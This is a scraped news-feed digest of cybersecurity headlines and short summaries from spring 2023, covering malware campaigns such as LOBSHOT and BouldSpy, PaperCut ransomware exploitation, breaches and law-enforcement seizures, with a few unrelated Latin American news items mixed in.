                The previously undetected LOBSHOT malware is distributed using Google ads and gives operators VNC access to Windows devices. Researchers from Elastic Security Labs spotted a new remote access trojan dubbed LOBSHOT was being distributed through Google Ads. Threat actors are using an elaborate scheme of fake websites through Google Ads to spread their malware, the […]

                The post New Lobshot hVNC malware spreads via Google ads appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, LOBSHOT malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On While VirusTotal gives the resulting MSI 0 detections, it is indeed sketchy, attempting to download a DLL from download-cdn[.]com, which would get executed with SYSTEM privileges.https://t.co/zg5e20IucZ pic.twitter.com/wPeUqKeQ8s — Will Dormann (@wdormann) January 23, 2023 Elastic experts observed over 500 unique LOBSHOT samples since July 2022, they are both 32-bit DLLs or 32-bit executables. "


                Medusa ransomware gang leaks students’ psychological reports and abuse allegations

                exploits ransomware
                2023-05-02 https://www.bitdefender.com/blog/hotforsecurity/medusa-ransomware-gang-leaks-students-psychological-reports-and-abuse-allegations/
                Students and teachers at the Minneapolis Public School (MPS) District, which suffered a huge ransomware attack at the end of February, have had highly sensitive information about themselves published on the web, including allegations of abuse by teachers and psychological reports. Read more in my article on the Hot for Security blog.

                Autosummary: Contained in the published data were: names and birthdates of children with special needs, details of their home lives and any disorders, results of intelligence tests, and details of what medication they might be taking.


                Onfido unveils identity verification service for Salesforce Financial Services Cloud

                financial
                2023-05-02 https://www.helpnetsecurity.com/2023/05/02/onfido-salesforce/

                Onfido announced that its Real Identity Platform services are now available for Salesforce Financial Services Cloud customers. Financial Services Cloud customers now have access to a suite of Onfido’s services, including Onfido’s library of global identity verification tools, Studio, Onfido’s identity orchestration product, and Atlas AI, Onfido’s anti-bias artificial intelligence software. These tools can be integrated with Onfido’s Smart Capture Link, enabling Salesforce customers to use low-code technology to more quickly verify the identity of … More

                The post Onfido unveils identity verification service for Salesforce Financial Services Cloud appeared first on Help Net Security.

                "

                Autosummary: "


                LOBSHOT: A Stealthy, Financial Trojan and Info Stealer Delivered through Google Ads

                financial exploits
                2023-05-02 https://thehackernews.com/2023/05/lobshot-stealthy-financial-trojan-and.html
                In yet another instance of how threat actors are abusing Google Ads to serve malware, a threat actor has been observed leveraging the technique to deliver a new Windows-based financial trojan and information stealer called LOBSHOT. "LOBSHOT continues to collect victims while staying under the radar," Elastic Security Labs researcher Daniel Stepanic said in an analysis published last week. "One

                Autosummary: According to data from eSentire, the threat actors behind GootLoader have been linked to a string of attacks targeting law firms and corporate legal departments in the U.S., Canada, the U.K., and Australia.


                North Korea's ScarCruft Deploys RokRAT Malware via LNK File Infection Chains

                exploits
                2023-05-02 https://thehackernews.com/2023/05/north-koreas-scarcruft-deploys-rokrat.html
                The North Korean threat actor known as ScarCruft began experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default. "RokRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing archives containing LNK files that initiate

                Autosummary: Other bespoke malware used by the group includes, but is not limited to, Chinotto, BLUELIGHT, GOLDBACKDOOR, Dolphin, and, most recently, M2RAT.


                CISA adds TP-Link, Apache, and Oracle bugs to its Known Exploited Vulnerabilities catalog

                exploits
                2023-05-02 https://securityaffairs.com/145618/security/known-exploited-vulnerabilities-catalog-flaws-3.html

                US Cybersecurity and Infrastructure Security Agency (CISA) added TP-Link, Apache, and Oracle vulnerabilities to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following three new issues to its Known Exploited Vulnerabilities Catalog: CVE-2023-1389 (CVSS score: 8.8) – TP-Link Archer AX-21 Command Injection Vulnerability. The CVE-2023-1389 flaw is an unauthenticated […]

                The post CISA adds TP-Link, Apache, and Oracle bugs to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Hackers exploit 5-year-old unpatched flaw in TBK DVR devices

                exploits
                2023-05-02 https://www.bleepingcomputer.com/news/security/hackers-exploit-5-year-old-unpatched-flaw-in-tbk-dvr-devices/
                Hackers are actively exploiting an unpatched 2018 authentication bypass vulnerability in exposed TBK DVR (digital video recording) devices. [...]

                Autosummary: The vulnerability impacts the TBK DVR4104 and TBK DVR4216 and rebrands of these models sold under the Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR brands.


                Easily exploitable flaw in Oracle Opera could spell trouble for hotel chains (CVE-2023-21932)

                exploits
                2023-05-02 https://www.helpnetsecurity.com/2023/05/02/cve-2023-21932/

                A recently patched vulnerability (CVE-2023-21932) in Oracle Opera, a property management system widely used in large hotel and resort chains, is more critical than Oracle says it is and could be easily exploited by unauthenticated remote attackers to access sensitive information, a group of researchers has warned. Oracle Opera landing page (Source: Assetnote) What’s more, these systems are often exposed to the internet and they are not hard to find. According to security researcher Kevin … More

                The post Easily exploitable flaw in Oracle Opera could spell trouble for hotel chains (CVE-2023-21932) appeared first on Help Net Security.

                "

                Autosummary: About CVE-2023-21932 Oracle Opera, also known as Micros Opera, is a solution many companies in the hospitality industry – more specifically, those offering lodging and related services – use to manage reservations, sales, housekeeping, catering, and deliver personalized guest experiences. "


                BouldSpy Android Spyware: Iranian Government's Alleged Tool for Spying on Minority Groups

                government
                2023-05-02 https://thehackernews.com/2023/05/bouldspy-android-spyware-iranian.html
                A new Android surveillanceware possibly used by the Iranian government has been used to spy on over 300 individuals belonging to minority groups. The malware, dubbed BouldSpy, has been attributed with moderate confidence to the Law Enforcement Command of the Islamic Republic of Iran (FARAJA). Targeted victims include Iranian Kurds, Baluchis, Azeris, and Armenian Christian groups. "The spyware

                Autosummary: BouldSpy, like other Android malware families, abuses its access to Android's accessibility services and other intrusive permissions to harvest sensitive data such as web browser history, photos, contact lists, SMS logs, keystrokes, screenshots, clipboard content, microphone audio, and video call recordings.


                Dog diplomacy: Turkey sends Mexico puppy after search dog's death

                latam
                2023-05-02 https://www.bbc.co.uk/news/world-latin-america-65455317?at_medium=RSS&at_campaign=KARANGA
                The puppy is meant to "carry on the legacy" of a Mexican search dog that died after Turkey's quake.


                Level Finance crypto exchange hacked after two security audits

                financial
                2023-05-02 https://www.bleepingcomputer.com/news/security/level-finance-crypto-exchange-hacked-after-two-security-audits/
                Hackers exploited a Level Finance smart contract vulnerability to drain 214,000 LVL tokens from the decentralized exchange and swapped them for 3,345 BNB, worth approximately $1,100,000. [...]

                Autosummary: "Specifically, the claim reward was determined by the tier of referral and reward points, hence the attacker made the following preparation: 1) creating and setting many referrals; 2) using flashloan to perform dozens of swaps (the reward was updated in the postSwap function)," explained BlockSec on Twitter.


                FBI seizes 9 crypto exchanges used to launder ransomware payments

                exploits ransomware
                2023-05-02 https://www.bleepingcomputer.com/news/security/fbi-seizes-9-crypto-exchanges-used-to-launder-ransomware-payments/
                The FBI and Ukrainian police have seized nine cryptocurrency exchange websites that facilitated money laundering for scammers and cybercriminals, including ransomware actors. [...]


                FBI and Ukrainian police seized 9 crypto exchanges used by cybercriminals

                ciber
                2023-05-02 https://securityaffairs.com/145668/cyber-crime/crypto-exchanges-seizure.html

                A joint operation conducted by the FBI and Ukrainian police seized 9 crypto exchanges used by cybercriminal groups for money laundering. The Cyber Police Department together with the Main Investigative Department of the National Police, the Office of the Prosecutor General of Ukraine and in cooperation with the FBI conducted an international operation that seized […]

                The post FBI and Ukrainian police seized 9 crypto exchanges used by cybercriminals appeared first on Security Affairs.

                "

                Autosummary: The crypto exchanges seized by law enforcement are: 24xbtc.com 100btc.pro pridechange.com 101crypta.com uxbtc.com trust-exchange.org bitcoin24.exchange paybtc.pro owl.gold Law enforcement published the following seizure banner on the seized services: “Domain names offered by organizations which were engaged in cryptocurrency conversions and provided assistance to cyber-criminals were seized, and related servers were shut down. "


                Cybercriminals use proxies to legitimize fraudulent requests

                ciber
                2023-05-01 https://www.helpnetsecurity.com/2023/05/01/malicious-bot-attacks/

                Bot attacks were previously seen as relatively inconsequential type of online fraud, and that mentality has persisted even as threat actors have gained the ability to cause significant damage to revenue and brand reputation, according to HUMAN. Bad bot traffic Bad bot traffic overall increased even as people spent less time online. Legitimate human traffic dropped 28% YoY, but bad bot traffic increased 102% YoY — meaning that the percentage of bad bots out of … More

                The post Cybercriminals use proxies to legitimize fraudulent requests appeared first on Help Net Security.

                "

                Autosummary: Carding attacks rose 134% YoY, account takeover attacks rose 108% YoY, and scraping rose 107% YoY. Certain industries experienced more bot attacks than others. "


                Vietnamese Threat Actor Infects 500,000 Devices Using "Malverposting" Tactics

                industry
                2023-05-01 https://thehackernews.com/2023/05/vietnamese-threat-actor-infects-500000.html
                A Vietnamese threat actor has been attributed as behind a "malverposting" campaign on social media platforms to infect over 500,000 devices worldwide over the past three months to deliver variants of information stealers such as S1deload Stealer and SYS01stealer. Malverposting refers to the use of promoted social media posts on services like Facebook and Twitter to mass propagate malicious "

                Autosummary: "


                APT28 Targets Ukrainian Government Entities with Fake "Windows Update" Emails

                government
                2023-05-01 https://thehackernews.com/2023/05/apt28-targets-ukrainian-government.html
                The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers targeting various government bodies in the country. The agency attributed the phishing campaign to APT28, which is also known by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy. The email messages come with the subject line " "

                Autosummary: "


Boss of Mexico's migration authority charged over deadly fire

                latam
                2023-05-01 https://www.bbc.co.uk/news/world-latin-america-65447707?at_medium=RSS&at_campaign=KARANGA
                Forty migrants died in the fire while they were being held at a migrant centre in Ciudad Juárez. "

                Autosummary: "


                Twitter bug let legacy verified accounts see blue check in their profile

                exploits
                2023-05-01 https://www.bleepingcomputer.com/news/technology/twitter-bug-let-legacy-verified-accounts-see-blue-check-in-their-profile/
                A silly Twitter bug allowed previously-verified accounts to add their legacy "Blue Check" back to their profile for free. [...] "

                Autosummary: On April 20th, Twitter finally removed the legacy verified check marks from accounts worldwide that were used to demonstrate the authenticity of accounts belonging to businesses, celebrities, politicians, activists, and journalists. "


Hackers leak images to taunt Western Digital's cyberattack response

                ciber
                2023-05-01 https://www.bleepingcomputer.com/news/security/hackers-leak-images-to-taunt-western-digitals-cyberattack-response/
The ALPHV ransomware operation, aka BlackCat, has published screenshots of internal emails and video conferences stolen from Western Digital, indicating they likely had continued access to the company's systems even as the company responded to the breach. [...] "

                Autosummary: In response, the company shut down its cloud services for two weeks, including My Cloud, My Cloud Home, My Cloud Home Duo, My Cloud OS 5, SanDisk ibi, and SanDisk Ixpand Wireless Charger, together with linked mobile, desktop, and web apps. "


                New Decoy Dog Malware Toolkit Uncovered: Targeting Enterprise Networks

                exploits
                2023-05-01 https://thehackernews.com/2023/05/new-decoy-dog-malware-toolkit-uncovered.html
                An analysis of over 70 billion DNS records has led to the discovery of a new sophisticated malware toolkit dubbed Decoy Dog targeting enterprise networks. Decoy Dog, as the name implies, is evasive and employs techniques like strategic domain aging and DNS query dribbling, wherein a series of queries are transmitted to the command-and-control (C2) domains so as to not arouse any suspicion. " "

                Autosummary: "


                German IT provider Bitmarck hit by cyberattack

                ciber
                2023-05-01 https://securityaffairs.com/145568/hacking/bitmarck-cyberattack.html

                Bitmarck, one of the largest IT service providers for social insurance carriers in Germany, announced yesterday that it has suffered a cyber attack. The German IT service provider Bitmarck announced on April 30 it had taken all its systems offline due to a cyberattack. The incident impacted statutory health insurance companies that have their IT operated […]

                The post German IT provider Bitmarck hit by cyberattack appeared first on Security Affairs.

                "

Autosummary: "


                Iranian govt uses BouldSpy Android malware for internal surveillance operations

                exploits
                2023-05-01 https://securityaffairs.com/145550/hacking/iran-bouldspy-android-spyware.html

Iranian authorities have been spotted using the BouldSpy Android malware to spy on minorities and traffickers. Researchers at the Lookout Threat Lab have discovered a new Android surveillance spyware, dubbed BouldSpy, that was used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA). The researchers have been tracking the spyware since March 2020, starting in […]

                The post Iranian govt uses BouldSpy Android malware for internal surveillance operations appeared first on Security Affairs.

                "

Autosummary: Below is a list of the surveillance capabilities supported by the spyware: getting all account usernames available on the device and their associated types (such as Google, Telegram, WhatsApp and others); list of installed apps; browser history and bookmarks; live call recordings; call logs; taking photos from the device cameras; contact lists; device information (IP address, SIM card information, Wi-Fi information, Android version, and device identifiers). "


                Russian APT Nomadic Octopus hacked Tajikistani carrier

                rusia-ucrania Telcos
                2023-05-01 https://securityaffairs.com/145536/apt/nomadic-octopus-targets-tajikistani-carrier.html

                Russian APT group Nomadic Octopus hacked a Tajikistani carrier to spy on government officials and public service infrastructures. Russian cyber espionage group Nomadic Octopus (aka DustSquad) has hacked a Tajikistani telecoms provider to spy on 18 entities, including high-ranking government officials, telecommunication services, and public service infrastructures. The cyberspies compromised a broad range of devices, […]

                The post Russian APT Nomadic Octopus hacked Tajikistani carrier appeared first on Security Affairs.

                "

Autosummary: "


                New LOBSHOT malware gives hackers hidden VNC access to Windows devices

                exploits
                2023-05-01 https://www.bleepingcomputer.com/news/security/new-lobshot-malware-gives-hackers-hidden-vnc-access-to-windows-devices/
                A new malware known as "LOBSHOT" distributed using Google ads allows threat actors to stealthily take over infected Windows devices using hVNC. [...] "

                Autosummary: However, these sites pushed malware instead of distributing legitimate applications, including Gozi, RedLine, Vidar, Cobalt Strike, SectoRAT, and the Royal Ransomware. "


                T-Mobile discloses second data breach since the start of 2023

                financial
                2023-05-01 https://www.bleepingcomputer.com/news/security/t-mobile-discloses-second-data-breach-since-the-start-of-2023/
                T-Mobile disclosed the second data breach of 2023 after discovering that attackers had access to the personal information of hundreds of customers for more than a month, starting late February 2023. [...] "

                Autosummary: "


                T-Mobile suffered the second data breach in 2023

                financial
                2023-05-01 https://securityaffairs.com/145590/data-breach/t-mobile-second-data-breach-2022.html

T-Mobile disclosed the second data breach of 2023: threat actors had access to the personal information of hundreds of customers since February. T-Mobile suffered the second data breach of 2023, in which threat actors had access to the personal information of hundreds of customers starting in late February 2023. The security breach impacted a limited number of […]

                The post T-Mobile suffered the second data breach in 2023 appeared first on Security Affairs.

                "

                Autosummary: "


                Experts spotted a new sophisticated malware toolkit called Decoy Dog

                exploits
                2023-05-01 https://securityaffairs.com/145580/malware/decoy-dog-sophisticated-malware-toolkit.html

                Infoblox researchers discovered a new sophisticated malware toolkit, dubbed Decoy Dog, targeting enterprise networks. While analyzing billions of DNS records, Infoblox researchers discovered a sophisticated malware toolkit, dubbed Decoy Dog, that was employed in attacks aimed at enterprise networks. Threat actors behind the malware were observed using known tricks to avoid detection such as registering a domain, […]

                The post Experts spotted a new sophisticated malware toolkit called Decoy Dog appeared first on Security Affairs.

                "

Autosummary: "


Brazil's Lula recognises six new indigenous reserves

                latam
                2023-04-29 https://www.bbc.co.uk/news/world-latin-america-65433284?at_medium=RSS&at_campaign=KARANGA
                Mining is banned and logging restricted in a vast Amazon area and some other indigenous reserves. "

                Autosummary: "


                UK Cyber Security Council launches certification mapping tool

                government
                2023-04-29 https://www.helpnetsecurity.com/2023/04/30/uk-cyber-security-council-certification-mapping-tool/

The UK Cyber Security Council has launched the first phase of its certification mapping tool. It has been created to map all available cyber security certifications onto the 16 specialisms identified by the Council, with the first phase now available. The tool currently includes at least one certification per specialism, with more to be added. The Council aims to deliver a comprehensive resource that contains all options of value to each career path, and the … More

                The post UK Cyber Security Council launches certification mapping tool appeared first on Help Net Security.

                "

                Autosummary: "


                Migrants: US to open new processing centres in Colombia and Guatemala

                latam
                2023-04-28 https://www.bbc.co.uk/news/world-latin-america-65420394?at_medium=RSS&at_campaign=KARANGA
Washington also plans to increase deportations to try to reduce the number of people entering the US illegally. "

                Autosummary: "


                Phishing-resistant MFA shapes the future of authentication forms

                financial
                2023-04-28 https://www.helpnetsecurity.com/2023/04/28/phishing-resistant-mfa-authentication-forms/

Over the last two years, respondents reported a continued reliance on the least secure forms of authentication, including traditional usernames and passwords and one-time passwords (OTPs), according to Yubico. Not all MFA is equal: the results are surprising considering 59% of respondents reported having a security breach within the past year, up 6% from just two years ago. Additionally, the report revealed a significant increase in MFA deployment for customers, which jumped to 57% … More

                The post Phishing-resistant MFA shapes the future of authentication forms appeared first on Help Net Security.

                "

                Autosummary: "


                Major UK banks including Lloyds, Halifax, TSB hit by outages

                financial
                2023-04-28 https://www.bleepingcomputer.com/news/technology/major-uk-banks-including-lloyds-halifax-tsb-hit-by-outages/
                Websites and mobile apps of Lloyds Bank, Halifax, TSB Bank, and Bank of Scotland are experiencing web and mobile app outages leaving customers unable to access their account balances and information. [...] "

Autosummary: Major UK banks facing internet outage. BleepingComputer has been able to confirm that the four major UK banks have been experiencing disruptions to their online banking and mobile banking systems since the early morning hours of Friday, April 28th. "


                “Ashamed” LockBit ransomware gang apologises to hacked school, offers free decryption tool

                exploits ransomware
                2023-04-28 https://www.bitdefender.com/blog/hotforsecurity/ashamed-lockbit-ransomware-gang-apologises-to-hacked-school-offers-free-decryption-tool/
                Is it possible ransomware gangs actually do have a heart? Read more in my article on the Hot for Security blog. "

                Autosummary: "


                Tonto Team Uses Anti-Malware File to Launch Attacks on South Korean Institutions

                exploits
                2023-04-28 https://thehackernews.com/2023/04/tonto-team-uses-anti-malware-file-to.html
                South Korean education, construction, diplomatic, and political institutions are at the receiving end of new attacks perpetrated by a China-aligned threat actor known as the Tonto Team. "Recent cases have revealed that the group is using a file related to anti-malware products to ultimately execute their malicious attacks," the AhnLab Security Emergency Response Center (ASEC) said in a report "

                Autosummary: "


                CISA warns of critical bugs in Illumina DNA sequencing systems

                exploits
                2023-04-28 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-bugs-in-illumina-dna-sequencing-systems/
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FDA have issued an urgent alert about two vulnerabilities that impact Illumina's Universal Copy Service (UCS), used for DNA sequencing in medical facilities and labs worldwide. [...] "

Autosummary: The flaws impact the following Illumina products: iScan Control Software v4.0.0; iScan Control Software v4.0.5; iSeq 100, all versions; MiniSeq Control Software v2.0 and newer; MiSeq Control Software v4.0 (RUO Mode); MiSeqDx Operating Software v4.0.1 and newer; NextSeq 500/550 Control Software v4.0; NextSeq 550Dx Control Software v4.0 (RUO Mode); NextSeq 550Dx Operating Software v1.0.0 to 1.3.1; NextSeq 550Dx Operating Software v1.3.3 and newer; NextSeq 1000/2000 Control Software v1.7 and prior; NovaSeq 6000 Control Software v1.7 and prior; NovaSeq Control Software v1.8. The vulnerabilities do not impact software versions not specified in the above list, and hence no actions need to be taken. "


                New Atomic macOS Malware Steals Keychain Passwords and Crypto Wallets

                exploits
                2023-04-28 https://thehackernews.com/2023/04/new-atomic-macos-stealer-can-steal-your.html
Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer. "The Atomic macOS Stealer can steal various types of information from the victim's machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and "

                Autosummary: "


                The Week in Ransomware - April 28th 2023 - Clop at it again

                exploits ransomware
                2023-04-28 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-28th-2023-clop-at-it-again/
It has been a very quiet week for ransomware news, with only a few reports released and not much info about cyberattacks. An item of interest was Microsoft linking the recent PaperCut server attacks to the Clop and LockBit ransomware operations. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @serghei, @DanielGallagher, @malwareforme, @malwrhunterteam, @FourOctets, @billtoulas, @struppigel, @LawrenceAbrams, @Ionut_Ilascu, @Seifreed, @demonslay335, @BleepinComputer, @fwosar, @jorntvdw, @PolarToffee, @uptycs, @Trellix, @MsftSecIntel, @AlvieriD, @Jon__DiMaggio, @Fortinet, and @pcrisk. "


                ViperSoftX info-stealing malware now targets password managers

                exploits
                2023-04-28 https://www.bleepingcomputer.com/news/security/vipersoftx-info-stealing-malware-now-targets-password-managers/
                A new version of the ViperSoftX information-stealing malware has been discovered with a broader range of targets, including targeting the KeePass and 1Password password managers. [...] "

                Autosummary: However, in the latest variant, Trend Micro spotted increased functionality that steals from the following additional wallets: Armory Atomic Wallet Binance Bitcoin Blockstream Green Coinomi Delta Electrum Exodus Guarda Jaxx Liberty Ledger Live Trezor Bridge Coin98 Coinbase MetaMask Enkrypt Of particular interest, Trend Micro also reports that ViperSoftX is now checking for files associated with two password managers, namely 1Password and KeePass 2, attempting to steal data stored in their browser extensions. "


                OpenAI reinstates ChatGPT service in Italy after meeting Garante Privacy’s demands

                government
                2023-04-28 https://securityaffairs.com/145434/security/openai-chatgpt-italy.html

OpenAI announced that access to its chatbot service ChatGPT is allowed again in Italy after the company met the demands of regulators. OpenAI restored access to ChatGPT in Italy after the company met the demands of the Italian Data Protection Authority, Garante Privacy. In early April, the Italian Data Protection Authority temporarily banned ChatGPT […]

                The post OpenAI reinstates ChatGPT service in Italy after meeting Garante Privacy’s demands appeared first on Security Affairs.

                "

Autosummary: Below is the list of measures implemented by OpenAI: – drafted and published, on its website, an information notice addressed to users and non-users, in Europe and elsewhere, describing which personal data are processed under which arrangements for training algorithms, and recalling that everyone has the right to opt out from such processing; – expanded its privacy policy for users and made it also accessible from the sign-up page prior to registration with the service; – granted all individuals in Europe, including non-users, the right to opt out from processing of their data for training of algorithms, also by way of an online, easily accessible ad-hoc form; – introduced a welcome back page in case of reinstatement of the service in Italy containing links to the new privacy policy and the information notice on the processing of personal data for training algorithms; – introduced mechanisms to enable data subjects to obtain erasure of information that is considered inaccurate, whilst stating that it is technically impossible, as of now, to rectify inaccuracies; – clarified in the information notice for users that it would keep on processing certain personal data to enable performance of its services on a contractual basis, but that it would process users’ personal data for training algorithms on the legal basis of its legitimate interest, without prejudice to users’ right to opt out from such processing; – implemented a form to enable all European users to opt out from the processing of their personal data and thus to filter out their chats and chat history from the data used for training algorithms; – added, in the welcome back page reserved for Italian registered users, a button for them to confirm that they are aged above 18 prior to gaining access to the service, or else that they are aged above 13 and have obtained consent from their parents or guardians for that purpose; – included the request to specify one’s birthdate in the service sign-up page to block access by users aged below 13 and to request confirmation of the consent given by parents or guardians for users aged between 13 and 18. "


                Cisco discloses a bug in the Prime Collaboration Deployment solution

                exploits
                2023-04-28 https://securityaffairs.com/145423/security/cisco-prime-collaboration-deployment-xss.html

                Cisco is working on a patch for a bug in the Prime Collaboration Deployment solution that was reported by a member of NATO’s Cyber Security Centre (NCSC). Cisco informed its customers that it’s working on a patch for cross-site scripting (XSS) issue, tracked as CVE-2023-20060 (CVSS score 6.1), affecting its Prime Collaboration Deployment product. The vulnerability […]

                The post Cisco discloses a bug in the Prime Collaboration Deployment solution appeared first on Security Affairs.

                "

                Autosummary: "


                LockBit and Cl0p ransomware gangs actively exploiting Papercut vulnerabilities

                exploits ransomware
                2023-04-28 https://www.malwarebytes.com/blog/news/2023/04/lockbit-and-cl0p-are-actively-exploiting-papercut-vulnerabilities

Categories: News, Ransomware

Tags: PaperCut, Cl0p, LockBit

Vulnerabilities in PaperCut printing management are being used in ransomware attacks.

                The post LockBit and Cl0p ransomware gangs actively exploiting Papercut vulnerabilities appeared first on Malwarebytes Labs.

                "

Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. In a surprising turn of events for the ransomware landscape, Cl0p emerged as the most used ransomware in March 2023, coming out of nowhere to dethrone the usual frontrunner, LockBit. This makes a vulnerability, especially one that is as easy to exploit, a virtual goldmine for ransomware peddlers, and puts a bullseye on anyone that is running an unpatched server. "


                PaperCut vulnerabilities leveraged by Clop, LockBit ransomware affiliates

                exploits ransomware
                2023-04-27 https://www.helpnetsecurity.com/2023/04/27/papercut-lockbit-clop/

Clop and LockBit ransomware affiliates are behind the recent attacks exploiting vulnerabilities in PaperCut application servers, according to Microsoft and Trend Micro researchers. The detected campaigns: “Microsoft is attributing the recently reported attacks exploiting the CVE-2023-27350 and CVE-2023-27351 vulnerabilities in print management software PaperCut to deliver Clop ransomware to the threat actor tracked as Lace Tempest (overlaps with FIN11 and TA505),” Microsoft shared. “Lace Tempest (DEV-0950) is a Clop ransomware affiliate that has been observed … More

                The post PaperCut vulnerabilities leveraged by Clop, LockBit ransomware affiliates appeared first on Help Net Security.

                "

Autosummary: The detected campaigns: “Microsoft is attributing the recently reported attacks exploiting the CVE-2023-27350 and CVE-2023-27351 vulnerabilities in print management software PaperCut to deliver Clop ransomware to the threat actor tracked as Lace Tempest (overlaps with FIN11 and TA505),” Microsoft shared. "


                GitHub introduces private vulnerability reporting for open source repositories

                exploits
                2023-04-27 https://www.helpnetsecurity.com/2023/04/27/github-vulnerability-reporting/

                GitHub has announced that its private vulnerability reporting feature for open source repositories is now available to all project owners. General availability The private vulnerability reporting feature provides a direct collaboration channel that allows researchers to more easily report vulnerabilities, and maintainers to easily fix them. It has been available in public beta since November 2022. “Since then, maintainers for more than 30k organizations have enabled private vulnerability reporting on more than 180k repositories, receiving … More

                The post GitHub introduces private vulnerability reporting for open source repositories appeared first on Help Net Security.

                "

                Autosummary: "


RTM Locker's First Linux Ransomware Strain Targeting NAS and ESXi Hosts

                exploits ransomware
                2023-04-27 https://thehackernews.com/2023/04/rtm-lockers-first-linux-ransomware.html
The threat actors behind RTM Locker have developed a ransomware strain that's capable of targeting Linux machines, marking the group's first foray into the open source operating system. "Its locker ransomware infects Linux, NAS, and ESXi hosts and appears to be inspired by Babuk ransomware's leaked source code," Uptycs said in a new report published Wednesday. "It uses a combination of ECDH on "

Autosummary: "Its locker ransomware infects Linux, NAS, and ESXi hosts and appears to be inspired by Babuk ransomware's leaked source code," Uptycs said in a new report published Wednesday. "


                Microsoft Confirms PaperCut Servers Used to Deliver LockBit and Cl0p Ransomware

                exploits ransomware
                2023-04-27 https://thehackernews.com/2023/04/microsoft-confirms-papercut-servers.html
Microsoft has confirmed that the active exploitation of PaperCut servers is linked to attacks that are designed to deliver Cl0p and LockBit ransomware families. The tech giant's threat intelligence team is attributing a subset of the intrusions to a financially motivated actor it tracks under the name Lace Tempest (formerly DEV-0950), which overlaps with other hacking groups like FIN11, TA505, "

Autosummary: The tech giant's threat intelligence team is attributing a subset of the intrusions to a financially motivated actor it tracks under the name Lace Tempest (formerly DEV-0950), which overlaps with other hacking groups like FIN11, TA505, and Evil Corp. "In observed attacks, Lace Tempest ran multiple PowerShell commands to deliver a TrueBot DLL, which connected to a C2 server, attempted to steal LSASS credentials, and injected the TrueBot payload into the conhost.exe service," Microsoft said in a series of tweets. "


                Iranian Charming Kitten APT used a new BellaCiao malware in recent wave of attacks

                exploits
                2023-04-27 https://securityaffairs.com/145354/malware/iran-charming-kitten-bellaciao.html

                Iran-linked APT group Charming Kitten employed a new malware dubbed BellaCiao in attacks against victims in the U.S., Europe, the Middle East and India. Iran-linked Charming Kitten group, (aka APT35, Phosphorus, Newscaster, and Ajax Security Team) made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media. Microsoft has been tracking the threat actors at […]

                The post Iranian Charming Kitten APT used a new BellaCiao malware in recent wave of attacks appeared first on Security Affairs.

                "

Autosummary: Z:\BellaCiao\BellaCiao\More Targets\<Country>\<Public IP>\<Hostname>\backdoor\MicrosoftAgentServices\MicrosoftAgentServices\obj\Release\ “Using information from these files, we can learn that victims were organized in different folders by country, using folder names like IL(Israel), TR(Turkey), AT(Austria), IN(India) or IT(Italy)” "


                New Atomic macOS info-stealing malware targets 50 crypto wallets

                exploits
                2023-04-27 https://www.bleepingcomputer.com/news/security/new-atomic-macos-info-stealing-malware-targets-50-crypto-wallets/
                A new macOS information-stealing malware named "Atomic" (aka "AMOS") is being sold to cybercriminals via private Telegram channels for a subscription of $1,000 per month. [...] "

Autosummary: Cryptocurrency wallets: Electrum, Binance, Exodus, Atomic. Cryptocurrency wallet extensions: 50 extensions are targeted in total, including Trust Wallet, Exodus Web3 Wallet, Jaxx Liberty, Coinbase, Guarda, TronLink, Trezor Password Manager, Metamask, Yoroi, and BinanceChain. "


                Thales CTE-RWP protects critical files and folders from ransomware attacks

                exploits ransomware
                2023-04-27 https://www.helpnetsecurity.com/2023/04/27/thales-cte-rwp/

                At RSA Conference 2023, Thales launched CipherTrust Transparent Encryption Ransomware Protection (CTE-RWP), an optional licensed feature to the CipherTrust Data Security Platform. CTE-RWP will elevate the protection of customer files and folders from ransomware attacks via access management controls and encryption processes. According to the 2023 Thales Data Threat Report, 49% of IT professionals reported an increase in ransomware attacks with 22% of organisations having experienced a ransomware attack in past 12 months. Ransomware attacks … More

                The post Thales CTE-RWP protects critical files and folders from ransomware attacks appeared first on Help Net Security.

                "

                Autosummary: The release of this new Ransomware Protection helps bring an industry-leading solution to market, strengthening the Thales CipherTrust Data Security Platform and offering further protection against an ever-increasing threat to data. "


                Paperbug Attack: New Politically-Motivated Surveillance Campaign in Tajikistan

                exploits
                2023-04-27 https://thehackernews.com/2023/04/paperbug-attack-new-politically.html
                A little-known Russian-speaking cyber-espionage group has been linked to a new politically-motivated surveillance campaign targeting high-ranking government officials, telecom services, and public service infrastructures in Tajikistan. The intrusion set, dubbed Paperbug by Swiss cybersecurity company PRODAFT, has been attributed to a threat actor known as Nomadic Octopus (aka DustSquad). "The "

                Autosummary: The Windows malware, dubbed Octopus and which masqueraded as an alternative version of the Telegram messaging app, is a Delphi-based tool that allows the adversary to surveil victims, siphon sensitive data, and gain backdoor access to their systems via a command-and-control (C2) panel. "


                LimeRAT Malware Analysis: Extracting the Config

                exploits
                2023-04-27 https://thehackernews.com/2023/04/limerat-malware-analysis-extracting.html
